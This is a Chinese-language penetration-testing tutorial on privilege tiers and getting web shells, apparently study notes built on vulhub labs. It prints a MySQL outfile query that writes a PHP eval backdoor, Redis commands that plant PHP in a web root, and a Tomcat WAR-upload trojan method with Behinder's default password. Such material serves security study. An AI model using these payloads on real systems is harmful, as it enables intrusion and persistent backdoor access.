0x00 权限的介绍
权限划分:
后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等
权限获取方法:
后台权限:弱口令,sql注入,数据库配置文件泄露,源码泄露
web权限:RCE,文件操作,反序列化,sql注入
数据库权限:数据库配置文件泄露,sql注入,后台或web权限转入
接口权限:数据库配置文件泄露,源码泄露,sql注入,后台或web权限转入
系统权限:系统漏洞,web,数据库,后台等权限提权后转入
域控权限:域控系统漏洞,内网横向渗透转入
常见权限获取后能干什么:
后台权限:
常规WEB界面文章分类等操作,可能有文件操作的功能(文件上传),也可能可以修改源码
web权限:
查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等)
数据库权限:
数据库的增删改查,源码或配置文件泄漏
后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。
系统权限:相当于自己的电脑
域控权限:相当于自己的虚拟机(可以控制域内的所有主机)
权限提升:
在有域的环境下权限提升一般来说是这样的,从后台到web,再到系统,最后到域控,但是可能会出现直接到web权限,或直接到系统权限,都是又可能的
0x01 中间件语言JSP&APS&PHP获取webshell后的权限
webshell其实就是web权限
常见搭配
JSP+Tomcat+oracle
ASP&NET+IIS+myssql
PHP+Apache+mysql(phpstudy)
webshell其实就是web权限
jsp后门,不需要提权,直接是root
php后门 windows(phpstudy) 为管理员权限 继承了安装phpstudy时的权限
php后门 linux(lamp,非集成化环境) 为普通用户权限
asp后门
是服务用户,权限比较低
所谓的提权就是做当前用户所不能做的事情,通过提权,做了当前用户所不能做的事情,那么这个提权就成功了,比如当前用户不能执行ifconfig命令,通过提权后可以执行,这就是一个提权的案列
0x02 getshell
1.网站bagecms
从后台到web权限
明确功能点实现的意义是否满足网站权限的提升
不同的程序可以通过程序名版本进行网上公开资料利用
改源码连一户话木马
蚁剑设置代理
2.第三方应用phpmyadmin getshell
从数据库权限到web权限
show variables like '%basedir%';查看mysql安装目录,通过这个猜测根目录
show variables like '%secure%'; #查看是否可以写入文件,secure_file_prvi为空时可以写入
select '<?php @eval($_POST[11])?>' into outfile 'E:\\phpstudy_pro\\www\\aaa.php';
secure_file_prvi=''可以写入
3.数据库服务redies未授权访问 getshell
从数据库权限到web权限
redis-server /etc/redis.conf #启动redies
redis-cli -h 127.0.0.1 #登录redis
config set dir /var/www/html #设置WEB写入目录
config set dbfilename test.php #设置写入文件名
set test "<?php phpinfo();?>" #设置写入文件代码
bgsave #保存执行
save #保存执行
#在外面执行
systemctl restart apache2 #开启web服务器
4.中间件tomacat
从后台到web权限
环境:
vulhub的Tomcat7+ 弱密码和后端 Getshell 漏洞
把木马打包成zip,后缀改为war上传
上传成功
木马地址是ip+文件名/文件名.jsp
连接冰蝎,默认密码rebeyond